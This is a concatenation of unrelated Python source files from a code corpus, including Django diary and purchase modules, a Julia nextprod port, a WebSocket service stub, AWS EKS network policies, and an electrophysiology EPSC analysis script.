            view_class._nested_args = getattr(view_class, '_nested_args', OrderedDict())
            view_class._nested_args[self.name] = self.request_arg
        if self._subs:
            for sub_action_name, sub_action_view in self.generate_decorated_subs():
                setattr(view_class, sub_action_name, sub_action_view)
        setattr(view_class, *self.decorated_list())
        return view_class
| StarcoderdataPython |
366141 | <filename>diary/migrations/0001_initial.py
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
class Migration(migrations.Migration):
    """Initial auto-generated migration: creates the Diary and Entry tables.

    Avoid hand-editing the operations; create a follow-up migration instead.
    """

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Diary',
            fields=[
                ('id', models.AutoField(serialize=False, verbose_name='ID', primary_key=True, auto_created=True)),
                ('name', models.CharField(max_length=100)),
                ('description', models.CharField(max_length=500, null=True, blank=True)),
                ('update', models.DateTimeField(default=django.utils.timezone.now)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
            ],
            options={
                'verbose_name_plural': 'Diaries',
            },
        ),
        migrations.CreateModel(
            name='Entry',
            fields=[
                ('id', models.AutoField(serialize=False, verbose_name='ID', primary_key=True, auto_created=True)),
                ('title', models.CharField(max_length=100)),
                ('body', models.TextField()),
                ('update', models.DateTimeField(auto_now=True)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('diary', models.ForeignKey(to='diary.Diary')),
            ],
            options={
                'verbose_name_plural': 'Entries',
            },
        ),
    ]
| StarcoderdataPython |
299570 | """
Direct ports of Julia's `nextprod` [1], with helper function `nextpow` [2],
which are in Julia 1.2.0.
[1] https://github.com/JuliaLang/julia/blob/c6da87ff4bc7a855e217856757ad3413cf6d1f79/base/combinatorics.jl#L248-L262
[2] https://github.com/JuliaLang/julia/blob/c6da87ff4bc7a855e217856757ad3413cf6d1f79/base/intfuncs.jl#L334-L356
This derivative work is licensed under the MIT License, the same license as Julia Base.
"""
from typing import List
import math
def nextpow(a: float, x: float) -> float:
    """Return the smallest ``a**n`` (integer ``n`` >= 0) not less than ``x``.

    ``a`` must be greater than 1 and ``x`` greater than 0; for any
    ``x <= 1`` the answer is ``a**0 == 1``.

    Examples
    --------
    nextpow(2, 7) == 8, nextpow(2, 9) == 16,
    nextpow(5, 20) == 25, nextpow(4, 16) == 16.
    """
    assert x > 0 and a > 1
    if x <= 1:
        return 1.0
    exponent = math.ceil(math.log(x, a))
    # log() may land one power low due to rounding; check before returning.
    candidate = a ** (exponent - 1)
    if candidate >= x:
        return candidate
    return a ** exponent
def nextprod(a: List[int], x: int) -> int:
    """Smallest integer >= ``x`` writable as a product of powers of ``a``'s bases.

    Direct port of Julia's ``nextprod``: enumerates exponent combinations
    with a carry/odometer scheme, tracking the best candidate found.

    Example: nextprod([2, 3], 105) == 108 (= 2**2 * 3**3).
    """
    k = len(a)
    counters = [1] * k                            # current power of each base
    limits = [nextpow(base, x) for base in a]     # per-base upper bound
    counters[0] = limits[0]                       # start at the first case >= x
    prod = limits[0]                              # product for the current case
    best = prod
    carry_idx = 1
    while counters[-1] < limits[-1]:
        if prod >= x:
            if prod < best:
                best = prod                       # keep the best found yet
            carrying = True
            while carrying:
                # Reset this base's counter and carry into the next base.
                prod = prod // counters[carry_idx - 1]
                counters[carry_idx - 1] = 1
                carry_idx += 1
                prod *= a[carry_idx - 1]
                counters[carry_idx - 1] *= a[carry_idx - 1]
                carrying = counters[carry_idx - 1] > limits[carry_idx - 1] and carry_idx < k
            if prod < x:
                carry_idx = 1
        else:
            # Grow the first base until the product reaches x again.
            while prod < x:
                prod *= a[0]
                counters[0] *= a[0]
    return int(limits[-1] if limits[-1] < best else best)
| StarcoderdataPython |
11237313 | <reponame>celioroberto06/cursopythonexercicios
print('-' * 15)
print('LOJA O BARATÃO')
print('-' * 15)
# Running totals: purchase sum, count of items above R$1000, cheapest price/name.
total_compra = mais_caro = mais_barato = nome_barato = 0
perg = cont = 0
while True:
    nome = str(input('Nome do produto: '))
    preco = float(input('Preço: R$'))
    total_compra += preco
    cont += 1
    if preco > 1000:
        mais_caro += 1
    # The first item always becomes the cheapest so far.
    if cont == 1 or preco < mais_barato:
        mais_barato = preco
        nome_barato = nome
    perg = ' '
    # Keep asking until the first letter of the answer is S or N.
    # NOTE(review): an empty answer makes [0] raise IndexError — confirm
    # whether that is acceptable for this exercise.
    while perg not in 'SN':
        perg = str(input('Quer continuar? [S / N]')).upper().strip()[0]
    if perg == 'N':
        print('-----FIM DO PROGRAMA-----')
        break
# Final report.
print(f'O total da compra foi de {total_compra:.2f}')
print(f'Temos {mais_caro} produtos custando mais de R$ 1000.00')
print(f'O produto mais barato foi {nome_barato} que custa R${mais_barato:.2f}')
| StarcoderdataPython |
5035015 | # -*- coding: utf-8 -*-
#
# Copyright 2010 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TyphoonAE's WebSocket service stub."""
from typhoonae import websocket
from typhoonae.websocket import websocket_service_pb2
import google.appengine.api.apiproxy_stub
import httplib
import os
import re
__all__ = [
'Error',
'ConfigurationError',
'WebSocketServiceStub'
]
class Error(Exception):
    """Base exception type for the WebSocket service stub."""
class ConfigurationError(Error):
    """Raised when the environment is not correctly configured."""
class WebSocketServiceStub(google.appengine.api.apiproxy_stub.APIProxyStub):
    """TyphoonAE's WebSocket service stub."""

    def __init__(self, host, port=8888, service_name='websocket'):
        """Constructor.

        Args:
            host: Host name of the Web Socket service.
            port: Port number of the Web Socket service.
            service_name: Service name expected for all calls.
        """
        super(WebSocketServiceStub, self).__init__(service_name)
        self._host = host
        self._port = port

    def _GetAddress(self):
        """Returns the service address as 'host:port'."""
        return "%s:%s" % (self._host, self._port)

    @staticmethod
    def _GetEnviron(name):
        """Helper method ensures environment configured as expected.

        Args:
            name: Name of environment variable to get.

        Returns:
            Environment variable associated with name.

        Raises:
            ConfigurationError if required environment variable is not found.
        """
        try:
            return os.environ[name]
        except KeyError:
            raise ConfigurationError('%s is not set in environment.' % name)

    def _Dynamic_CreateWebSocketURL(self, request, response):
        """Implementation of WebSocketService::create_websocket_url().

        Args:
            request: A fully initialized CreateWebSocketURLRequest instance.
            response: A CreateWebSocketURLResponse instance.
        """
        url_parts = dict(
            protocol='ws',
            host=self._GetEnviron('SERVER_NAME'),
            port=self._port,
            # Strip a single leading slash so the template can add its own.
            success_path=re.sub('^/', '', request.success_path))
        response.url = websocket.WEBSOCKET_HANDLER_URL % url_parts

    def _SendMessage(self, body, socket, broadcast=False):
        """Sends a Web Socket message.

        Args:
            body: The message body.
            socket: A socket.
            broadcast: This flag determines whether a message should be sent
                to all active sockets but the sender.

        Returns:
            A WebSocketMessageResponse status code.
        """
        if broadcast:
            path = 'broadcast'
        else:
            path = 'message'
        conn = httplib.HTTPConnection(self._GetAddress())
        headers = {websocket.WEBSOCKET_HEADER: str(socket),
                   'X-TyphoonAE-ServerName': self._GetEnviron('SERVER_NAME'),
                   'Content-Type': 'text/plain'}
        # Bug fix: the original assigned NO_ERROR after the finally block,
        # unconditionally overwriting the OTHER_ERROR set on failure. The
        # success status now lives in the `else` clause so failures are
        # actually reported; the connection is still always closed.
        try:
            conn.request("POST", '/'+path, body.encode('utf-8'), headers)
        except Exception:
            status = websocket_service_pb2.WebSocketMessageResponse.OTHER_ERROR
        else:
            status = websocket_service_pb2.WebSocketMessageResponse.NO_ERROR
        finally:
            conn.close()
        return status

    def _Dynamic_SendMessage(self, request, response):
        """Implementation of WebSocketService::send_message().

        Args:
            request: A WebSocketMessageRequest instance.
            response: A WebSocketMessageResponse instance.
        """
        status = self._SendMessage(
            request.message.body, request.message.socket)
        response.status.code = status

    def _Dynamic_BroadcastMessage(self, request, response):
        """Implementation of WebSocketService::broadcast_message().

        Args:
            request: A WebSocketMessageRequest instance.
            response: A WebSocketMessageResponse instance.
        """
        status = self._SendMessage(
            request.message.body, None, broadcast=True)
        response.status.code = status
| StarcoderdataPython |
8002143 | from django.shortcuts import render
from .models import Purchase
from django.views.generic import TemplateView, ListView, DetailView, CreateView, UpdateView, DeleteView
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.urls import reverse_lazy
from django.shortcuts import get_object_or_404
from django.http import HttpResponse
#from .tasks import sleepy, send_to_sender
class PurchaseListView(LoginRequiredMixin,ListView):
    """Login-required list of purchases, newest first."""

    model = Purchase
    template_name = 'purchases/purchases_list.html'
    ordering = ['-created']
    # NOTE(review): this class attribute is not used by ListView (which reads
    # `model`/`queryset`); the queryset is lazy so it costs nothing, but it
    # looks like leftover code — confirm before removing.
    purchase = Purchase.objects.all()
    context_object_name = 'purchases'

    def get_context_data(self, *args, **kwargs):
        # Currently a pass-through; kept as an extension point.
        context = super(PurchaseListView, self).get_context_data(*args, **kwargs)
        return context

purchase_list_view = PurchaseListView.as_view()
class PurchaseDetailView(LoginRequiredMixin, DetailView):
    """Login-required detail page for a single Purchase."""

    model = Purchase
    # Fixed template path: was 'purchasess/...' (double 's' typo), which is
    # inconsistent with the 'purchases/...' prefix used by the list view and
    # would raise TemplateDoesNotExist.
    template_name = 'purchases/purchases_detail.html'

purchase_detail_view = PurchaseDetailView.as_view()
class PurchaseCreateView(LoginRequiredMixin,CreateView):
    """Login-required form for creating a Purchase."""

    model = Purchase
    # NOTE(review): the template lives under 'carts/' and the fields include
    # 'pk' and 'created' — both look copy-pasted from another app; confirm
    # the intended template and editable fields.
    template_name = 'carts/carts_form.html'
    fields = ['pk', 'purchases', 'buyer', 'sellers', 'purchases_price', 'created']

purchase_create_view = PurchaseCreateView.as_view()
class PurchaseUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
    """Update view restricted to the purchase's owner."""

    model = Purchase
    #template_name = 'products/product_form.html'
    fields = ['pk', 'purchases', 'buyer', 'sellers', 'purchases_price', 'created']

    def form_valid(self, form):
        # Stamp the requesting user on the instance before saving.
        form.instance.user = self.request.user
        return super().form_valid(form)

    def test_func(self):
        # Only the owner may edit. NOTE(review): a 'user' field is not in
        # `fields` above — confirm the Purchase model actually defines it.
        purchase = self.get_object()
        if self.request.user == purchase.user:
            return True
        return False

purchase_update_view = PurchaseUpdateView.as_view()
class PurchaseDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
    """Delete view restricted to the purchase's owner."""

    model = Purchase
    # template_name = 'products/product_form.html'
    success_url = reverse_lazy('purchase_list')

    def test_func(self):
        # Only the owner may delete. NOTE(review): assumes Purchase has a
        # 'user' field — verify against the model.
        purchase = self.get_object()
        if self.request.user == purchase.user:
            return True
        return False

purchase_delete_view = PurchaseDeleteView.as_view()
| StarcoderdataPython |
205554 | #-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*-
from os import path
import re
from bes.compat.map import map
from bes.system.execute import execute
from bes.key_value.key_value_list import key_value_list
from bes.text.text_line_parser import text_line_parser
from bes.common.algorithm import algorithm
class file_mime_type_unix_file_exe(object):
    'Detect mime types using the file utility on unix.'

    @classmethod
    def mime_type(clazz, filename):
        """Return (mime_type, charset) for filename via `file --brief --mime`.

        Raises IOError when the file does not exist; returns (None, None)
        when the `file` command fails.
        """
        # NOTE(review): filename is interpolated unquoted, so paths with
        # spaces or shell metacharacters will be misparsed — confirm whether
        # callers guarantee safe paths or whether quoting should be added.
        cmd = 'file --brief --mime %s' % (filename)
        if not path.isfile(filename):
            raise IOError('file not found: "{}"'.format(filename))
        rv = execute.execute(cmd, raise_error = False)
        if rv.exit_code != 0:
            return ( None, None )
        text = rv.stdout.strip()
        return clazz._parse_file_output(text)

    @classmethod
    def _parse_file_output(clazz, text):
        """Parse the full output of `file --brief --mime`.

        One line means a regular file; multiple lines mean a fat (multi-arch)
        binary, in which case the per-arch results are deduplicated. Note the
        return shape varies: a (mime, charset) tuple, or a list of such
        tuples when the architectures disagree.
        """
        lines = text_line_parser.parse_lines(text, strip_text = True, remove_empties = True)
        if len(lines) == 1:
            return clazz._parse_non_fat_file_output_line(lines[0])
        entries = [ clazz._parse_fat_file_output_line(line) for line in lines ]
        entries = [ entry for entry in entries if entry ]
        entries = algorithm.unique(entries)
        if len(entries) == 1:
            return entries[0]
        return entries

    @classmethod
    def _parse_non_fat_file_output_line(clazz, line):
        'Parse one line of `file --brief --mime` output for non-fat files.'
        # Format: "<mime>; key=value; key=value ..."
        parts = line.split(';')
        parts = [ part.strip() for part in parts if part.strip() ]
        mime_type = None
        values = key_value_list()
        if len(parts) > 0:
            mime_type = parts.pop(0).strip()
        for part in parts:
            values.extend(key_value_list.parse(part, delimiter = '='))
        values.remove_dups()
        kv = values.find_by_key('charset')
        charset = kv.value if kv else None
        return ( mime_type, charset )

    @classmethod
    def _parse_fat_file_output_line(clazz, line):
        'Parse one line of `file --brief --mime` output for fat files.'
        # Lines look like: "... (for architecture x86_64): <mime>; charset=..."
        r = re.findall(r'^.*\s\(for\sarchitecture\s(.+)\)\:\s+(.*)$', line)
        if len(r) == 1:
            arch, text = r[0]
            return clazz._parse_non_fat_file_output_line(text)
        # Anything other than zero or one match is unexpected input.
        assert len(r) == 0
        return None
| StarcoderdataPython |
def calculate(n, summ):
    """Recursively fold the binary digits of ``n`` onto ``summ``.

    For the call pattern ``calculate(n, 0)`` this returns the number of set
    bits (population count) of ``n``. Non-zero ``summ`` is added once per
    recursion level, matching the original's accumulator behavior.
    """
    if n <= 1:
        return n
    total = summ + calculate(n // 2, summ)
    total += n % 2
    return total
print(calculate(7, 0)) | StarcoderdataPython |
9602373 | import api
class MpAwsEks:
    """Meta-policy bundle for AWS EKS traffic.

    Each AcceptLink whitelists one observed client/server link shape
    (kube-proxy to the EKS endpoint, health probes / aws-cni to the IPAM
    agent, and the IPAM agent to the EC2 API) and optionally rewrites
    endpoint attributes via ``changes``.
    """

    policies = [
        # kube-proxy talking to the cluster's *.eks.amazonaws.com endpoint.
        api.AcceptLink(filters=[
            api.f.endpoint("app", "kube-system.kube.kube-proxy"),
            api.f.type("NAE"),
            api.f.endpoint("process", "kube-proxy", who="client"),
            api.f.endpoint("dns_pattern", ":.*\.eks\.amazonaws\.com:", who="server"),
        ], changes=[
            ("server", "dns_pattern", ":.*\.eks\.amazonaws\.com:"),
        ]),
        # Health probes and the CNI plugin reaching the node-local IPAM agent.
        api.AcceptLink(filters=[
            api.f.same_zone,
            api.f.endpoint("process", ["grpc-health-probe", "aws-cni"], who="client"),
            api.f.endpoint("process", "aws-k8s-agent", who="server"),
        ], changes=[
        ]),
        # IPAM agent calling the EC2 API; the region is generalized in `changes`.
        api.AcceptLink(filters=[
            api.f.endpoint("process", "aws-k8s-agent", who="client"),
            api.f.endpoint("dns_pattern", ":ec2.us-west-2.amazonaws.com:"),
        ], changes=[
            ("server", "dns_pattern", ":ec2\..*\.amazonaws\.com:"),
        ]),
    ]
# Register the meta-policy class with the global meta-policy runner.
print("Adding meta-policies to runner")
api.mpr.add(MpAwsEks)
| StarcoderdataPython |
1771854 | ################################################################################################################################################################
# @project Open Space Toolkit ▸ Core
# @file bindings/python/test/types/test_integer.py
# @author <NAME> <<EMAIL>>
# @license Apache License 2.0
################################################################################################################################################################
import pytest
from ostk.core.containers import *
################################################################################################################################################################
def test_array_set():
    """Check that the Array setters accept both Python lists and tuples.

    Bug fix: the section labeled "Real" duplicated the Integer calls
    (`set_integer_array`) instead of exercising `set_real_array`, so the
    Real setter was never tested (its getter is covered in test_array_get).
    """
    # int
    int_array_list = set_int_array([1, 2, 3])
    int_array_tuple = set_int_array((1, 2, 3))
    # double
    double_array_list = set_double_array([1.0, 2.0, 3.0])
    double_array_tuple = set_double_array((1.0, 2.0, 3.0))
    # Integer
    integer_array_list = set_integer_array([1, 2, 3])
    integer_array_tuple = set_integer_array((1, 2, 3))
    # Real
    real_array_list = set_real_array([1.0, 2.0, 3.0])
    real_array_tuple = set_real_array((1.0, 2.0, 3.0))
    # String
    string_array_list = set_string_array(['abc', 'def', 'ghi'])
    string_array_tuple = set_string_array(('abc', 'def', 'ghi'))
def test_array_get():
    """Check that the Array getters return iterables consumable from Python."""
    int_array = list(get_int_array())
    double_array = list(get_double_array())
    integer_array = list(get_integer_array())
    real_array = list(get_real_array())
    string_array = list(get_string_array())
################################################################################################################################################################
| StarcoderdataPython |
8104041 | # -*- coding: utf-8 -*-
"""
Created 5 March 2019
epsc_peak_x.y.z.py
"""
# from __main__ import *
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import elephant
from neo.io import IgorIO
import os
from collections import OrderedDict
import math
def get_metadata(file, data_notes):
    '''Parse a filename for metadata and merge it with the data_notes row.

    The output dictionary no longer shadows the builtin ``dict``.

    Parameters
    ----------
    file: str
        File name whose first two '_'-separated parts form the cell id,
        e.g. 'JH190301_c1_...' (id encodes the date as yymmdd after 2 chars).
    data_notes: pandas.DataFrame
        Cell spreadsheet; must contain a row whose 'Cell name' equals `file`,
        with columns 'File Path', 'Genotype', 'Cell type',
        'Depol sweeps start' and 'Depol sweeps stop'.

    Returns
    -------
    pandas.DataFrame
        Single-row frame of metadata for saving later.
    '''
    # pull out cell id, cell number and date from the filename
    file_split = file.split('_')
    cell_id = file_split[0] + '_' + file_split[1]
    cell_num = cell_id[-1:]
    date = '20' + cell_id[2:4] + '-' + cell_id[4:6] + '-' + cell_id[6:8]
    # 'drug' in the filename marks TTX+4-AP sweeps. The value is currently
    # not written to the output: the 'Condition' column is deliberately
    # disabled below (kept for easy re-enabling).
    if 'drug' in file:
        condition = 'TTX+4-AP'
    else:
        condition = 'control'
    # grab metadata from the data notes spreadsheet
    file_data = data_notes[data_notes['Cell name'] == file]
    cell_path = file_data['File Path'].tolist()[0]
    genotype = file_data['Genotype'].tolist()[0]
    cell_type = file_data['Cell type'].tolist()[0]
    depol_sweep_start = file_data['Depol sweeps start'].tolist()[0]
    depol_sweep_stop = file_data['Depol sweeps stop'].tolist()[0]
    # Assemble the single-row output; OrderedDict preserves column order.
    meta = OrderedDict()
    meta['Date'] = date
    meta['Cell ID'] = cell_id
    meta['Cell Number'] = cell_num
    meta['Cell Path'] = cell_path
    # meta['Condition'] = condition
    meta['Genotype'] = genotype
    meta['Cell Type'] = cell_type
    meta['Exclude Sweep Start'] = depol_sweep_start
    meta['Exclude Sweep Stop'] = depol_sweep_stop
    metadata = pd.DataFrame(meta, index=range(1))
    return metadata
def igor_to_pandas(file, data_dir):
    '''This function opens an igor binary file (.ibw), extracts the time
    series data, and returns a pandas DataFrame'''
    file_path = os.path.join(data_dir, file)
    data_raw = IgorIO(filename=file_path)
    data_neo = data_raw.read_block()
    # take the first analog signal of the first segment; presumably the .ibw
    # files hold exactly one block/segment of sweeps — TODO confirm
    data_neo_array = data_neo.segments[0].analogsignals[0]
    data_df = pd.DataFrame(data_neo_array.as_array())
    return data_df
def mean_baseline(data, stim_time, pre_stim=100, sf=10):
    '''
    Find the mean baseline in a given time series.

    Parameters
    ----------
    data: pandas.Series or pandas.DataFrame
        The time series data for which you want a baseline.
    stim_time: int or float
        The time in ms when stimulus is triggered.
    pre_stim: int or float
        Time in ms before the stimulus trigger over which baseline is measured.
    sf: int or float
        The sampling frequency in kHz.

    Returns
    -------
    baseline: float or pandas.Series
        The mean baseline over the defined window.
    '''
    # cast to int so float stim_time/sf values don't break positional .iloc
    start = int((stim_time - pre_stim) * sf)
    stop = int((stim_time - 1) * sf)
    window = data.iloc[start:stop]
    baseline = window.mean()
    return baseline
def epsc_peak(data, baseline, stim_time, polarity='-', post_stim=100, sf=10):
    '''
    Find the peak EPSC value for a pandas.Series or for each sweep (column) of
    a pandas.DataFrame. This finds the absolute peak value of mean baseline
    subtracted data.

    Parameters
    ----------
    data: pandas.Series or pandas.DataFrame
        Time series data with stimulated synaptic response triggered at the
        same time for each sweep.
    baseline: scalar or pandas.Series
        Mean baseline values used to subtract for each sweep.
    stim_time: int or float
        Time in ms at which stimulus is triggered each sweep.
    polarity: str
        The expected polarity of the EPSC; negative: '-'; positive: '+'.
        Default is '-'.
    post_stim: int or float
        Time in ms that marks the end of the sampling window post stimulus.
        Default is 100 ms.
    sf: int or float
        The sampling frequency in kHz. Default is 10 kHz.

    Returns
    -------
    epsc_peaks: pandas.Series
        The absolute peak of mean baseline subtracted time series data.

    Raises
    ------
    ValueError
        If polarity is neither '-' nor '+'.
    '''
    subtracted_data = data - baseline
    # cast to int so float stim_time/sf values don't break positional .iloc
    start = int(stim_time * sf)
    end = int((stim_time + post_stim) * sf)
    peak_window = subtracted_data.iloc[start:end]
    if polarity == '-':
        epsc_peaks = peak_window.min()
    elif polarity == '+':
        epsc_peaks = peak_window.max()
    else:
        raise ValueError(
            "polarity must either be + or -"
        )
    return epsc_peaks
def series_resistance(data, tp_start, vm_jump, sf=10):
    '''
    Calculate the approximate series resistance (Rs) from a test pulse (tp).

    Parameters
    ----------
    data: pandas.Series or pandas.DataFrame
        Raw time series data of the v-clamp recording in nA.
    tp_start: int or float
        Time in ms when test pulse begins.
    vm_jump: int or float
        Amplitude of the test pulse voltage command in mV.
    sf: int or float
        Sampling frequency in kHz. Default is 10 kHz.

    Returns
    -------
    rs: pandas.Series or float
        The series resistance for each sweep in MOhms.
    '''
    # find the baseline 10 ms pre test pulse and subtract from raw data
    rs_baseline = mean_baseline(data, stim_time=tp_start, pre_stim=11)
    rs_subtracted = data - rs_baseline
    # set up indices for starting and ending peak window (2 ms after tp onset);
    # cast to int so float tp_start/sf values don't break positional .iloc
    start = int(tp_start * sf)
    end = int((tp_start + 2) * sf)
    rs_window = rs_subtracted.iloc[start:end]
    # peak current has the same sign as the voltage step
    if vm_jump > 0:
        rs_peak = rs_window.max()
    else:
        rs_peak = rs_window.min()
    # calculate Rs via V=IR -> Rs = V/I; convert mV / nA into MOhms
    rs = ((vm_jump * 10**-3) / (rs_peak * 10**-9)) * 10**-6
    return rs
''' *********************************************************************** '''
''' ################## Define file structure on server #################### '''
# home_dir will depend on the OS, but the rest will not
# query machine identity and set home_dir from there
# NOTE(review): os.uname() does not exist on Windows, so the 'Z:' fallback
# branch below can never be reached there (AttributeError) — confirm intent.
machine = os.uname()[0]
if machine == 'Darwin':
    home_dir = '/Volumes/Urban'
elif machine == 'Linux':
    home_dir = '/run/user/1000/gvfs/smb-share:server=172.16.17.32,share=urban'
else:
    home_dir = os.path.join('Z:', os.sep)
# project directory layout: figures/, tables/, data/ under the project root
project_dir = os.path.join(home_dir, 'Huang', 'OSN_OMPvGg8_MTC')
figure_dir = os.path.join(project_dir, 'figures')
table_dir = os.path.join(project_dir, 'tables')
data_dir = os.path.join(project_dir, 'data')
''' ## Open the notes spreadsheet and parse for what we want to analyze ## '''
# open metadata file
data_notes = pd.read_csv(os.path.join(table_dir, 'OSN_Gg8vOMP.csv'))
# pull out cell_id for directory, file name, and make the full path
file_name_list = data_notes['Cell name'].tolist()
cell_id_list = []
for file in file_name_list:
    file_split = file.split('_')
    cell_id = file_split[0]+'_'+file_split[1]
    cell_id_list.append(cell_id)
# build relative paths '<cell_id>/<file>.ibw' and prepend them as a column
file_path_list = []
for cell, file in zip(cell_id_list, file_name_list):
    file_path = os.path.join(cell, file + '.ibw')
    file_path_list.append(file_path)
data_notes = pd.concat([pd.DataFrame({'File Path': file_path_list}), data_notes], axis=1)
# drop cells that didn't save to igor
noigor_list = np.array(data_notes[data_notes['Igor saved?'] == 'No'].index)
data_notes = data_notes.drop(index=noigor_list)
# drop cells that don't have any # of drug sweeps
nodrug_list = np.array(data_notes[data_notes['# of drug sweeps'].isnull() == True].index)
data_notes = data_notes.drop(index=nodrug_list)
# update file name list to have only files you want to analyze after logic
file_name_list = data_notes['Cell name'].tolist()
''' ##########################################################################
This is all the analysis, figures, saving
Read in file metadata, open file from igor, convert to pandas
##############################################################################
'''
# loop through all the files in file_name_list for plots and saving
for file_name in file_name_list:
    # set file name from list
    file = file_name
    # gather metadata and set some key parameters for use later on in loop
    metadata = get_metadata(file, data_notes)
    file_path = metadata['Cell Path'][0]
    cell_id = metadata['Cell ID'][0]
    genotype = metadata['Genotype'][0]
    exclude_start = metadata['Exclude Sweep Start'][0]
    exclude_stop = metadata['Exclude Sweep Stop'][0]
    # open igor file and convert to pandas (sweeps are columns, samples rows)
    data = igor_to_pandas(file_path, data_dir)
    # process logic and build exclude sweeps list from metadata, and exclude sweeps
    if math.isnan(exclude_start) is False:
        # need to pull out the end of the excluded sweeps
        # if all sweeps after start are excluded
        if math.isnan(exclude_stop) is True:
            data = data.iloc[:, :int(exclude_start)]
        # else only exclude traces in between start and stop
        else:
            begin = data.iloc[:, :int(exclude_start)]
            end = data.iloc[:, int(exclude_stop):]
            data = pd.concat([begin, end], axis=1)
    else:
        pass
    '''
    Pull out EPSC peak from unfiltered signals
    Baseline 100 ms preceding blue light
    Peak within 250 ms of blue light
    '''
    baseline = mean_baseline(data, 500)
    peaks = epsc_peak(data, baseline, 500)
    '''
    Pull out EPSC peaks from filtered signals
    Baseline 100 ms preceding blue light
    Peak within 250 ms of blue light
    '''
    # filter signal with butterworth filter at 500 Hz for data
    filt_data = elephant.signal_processing.butter(data.T,
                                                  lowpass_freq=500.0,
                                                  fs=10000.0)
    filt_data = pd.DataFrame(filt_data).T
    filt_baseline = mean_baseline(filt_data, 500)
    filt_peaks = epsc_peak(filt_data, filt_baseline, 500)
    ''' Calculating Series Resistance (rs) from test pulse (tp) '''
    rs = series_resistance(data, 50, -5)
    ''' Plot EPSC peaks and Rs over time of experiemnt '''
    # set up index markers for data | drug line and drug stimuli
    # pull out number of sweeps for both conditions and all
    n_control_sweeps = len(peaks)
    # set up auto y max for peak plots (min since negative)
    y_min = peaks.min()
    y_min_lim = y_min * 1.15 * 1000
    # set up logic for Rs y scaling: if < 20 MOhms, don't scale, if > scale
    if rs.max() <= 20:
        rs_y_min = 0
        rs_y_max = 20
    else:
        rs_y_min = rs.min() * 0.5
        rs_y_max = rs.max() * 1.2
    # make a figure with 2 plots
    # NOTE(review): figures are never closed (plt.close(fig)); memory grows
    # with the number of files processed — confirm acceptable.
    fig, axs = plt.subplots(2, 2, figsize=(6, 6), constrained_layout=True)
    fig.suptitle('Summary for ' + genotype + ' ' + cell_id)
    # optional for plotting unfiltered on same graph for comparison
    axs[0, 0].plot(peaks*1000, marker='.', color='darkgray', linestyle='', label='raw')
    # plot the filterd peak currents NOTE: convert peak values to pA
    axs[0, 0].plot(filt_peaks*1000, color='k', marker='.', linestyle='', label='filtered')
    axs[0, 0].set_xlabel('Stimulus Number')
    axs[0, 0].set_ylabel('EPSC Peak (pA)')
    axs[0, 0].set_ylim(0, y_min_lim)
    axs[0, 0].legend()
    # plot the series resistance values
    axs[0, 1].plot(rs, marker='.', color='k', linestyle='')
    axs[0, 1].set_xlabel('Stimulus Number')
    axs[0, 1].set_ylabel('Rs (MOhm)')
    axs[0, 1].set_ylim(rs_y_min, rs_y_max)
    ''' Plot averaged EPSC trace overlaying all the individual traces '''
    # calculate the mean and the SEM of the entire time series
    filt_subtracted = filt_data - filt_baseline
    filt_data_mean = filt_subtracted.mean(axis=1)
    filt_data_sem = filt_subtracted.sem(axis=1)
    filt_data_std = filt_subtracted.std(axis=1)
    # calculate auto y min limit for mean + std
    mean_std = (filt_data_mean - filt_data_std)
    y_min_mean_std = mean_std[5000:].min()
    y_min_mean_lim = y_min_mean_std * 1.1 * 1000
    # set up time value for length of traces and window of what to plot
    sweep_length = len(data)                  # allow for different sweep length
    sweep_time = np.arange(0, sweep_length/10, 0.1)     # time of sweeps in ms
    # set up length of line for light stimulation
    blue_light = np.arange(500, 550, 0.1)
    # plot mean data trace with all traces in gray behind
    axs[1, 0].plot(sweep_time, filt_subtracted*1000, color='darkgray', linewidth=0.5)
    axs[1, 0].plot(sweep_time, filt_data_mean*1000, color='k')
    axs[1, 0].hlines(75, 500, 550, color='deepskyblue')
    axs[1, 0].set_xlabel('Time (ms)')
    axs[1, 0].set_ylabel('Current (pA)')
    axs[1, 0].set_xlim(450, 800)
    axs[1, 0].set_ylim(y_min_lim, 100)
    # plot mean data trace with shaded SEM gray behind
    axs[1, 1].plot(sweep_time, filt_data_mean*1000, color='k', label='mean')
    axs[1, 1].fill_between(sweep_time,
                           (filt_data_mean - filt_data_std) * 1000,
                           (filt_data_mean + filt_data_std) * 1000,
                           color='darkgray',
                           label='st. dev.')
    axs[1, 1].hlines(75, 500, 550, color='deepskyblue')
    axs[1, 1].set_xlabel('Time (ms)')
    axs[1, 1].set_ylabel('Current (pA)')
    axs[1, 1].set_xlim(450, 800)
    axs[1, 1].set_ylim(y_min_mean_lim, 100)
    axs[1, 1].legend(loc=1)
    # fig
    # save figure to file
    fig_save_path = os.path.join(figure_dir, genotype + '_' + cell_id)
    fig.savefig(fig_save_path + '_summary.png', dpi=300, format='png')
    ''' Save all sweeps data for raw, filtered and rs to a csv file '''
    # save each sweep raw peak, filtered peak, and Rs to file
    data_dict = OrderedDict()
    data_dict['Raw Peaks (nA)'] = peaks
    data_dict['Filtered Peaks (nA)'] = filt_peaks
    data_dict['Rs (MOhms)'] = rs
    sweep_data = pd.DataFrame(data_dict)
    # save all_sweeps_data to file
    sweep_path = os.path.join(table_dir, genotype + '_' + cell_id)
    sweep_data.to_csv(sweep_path + '_all_sweeps_data.csv',
                      float_format='%8.4f', index=False, header=True)
    ''' Find the mean peak epscs for raw, filtered, and rs, and save '''
    # find mean, st dev, and sem of all sweeps for raw, filt, and rs
    mean = sweep_data.mean()
    std = sweep_data.std()
    sem = sweep_data.sem()
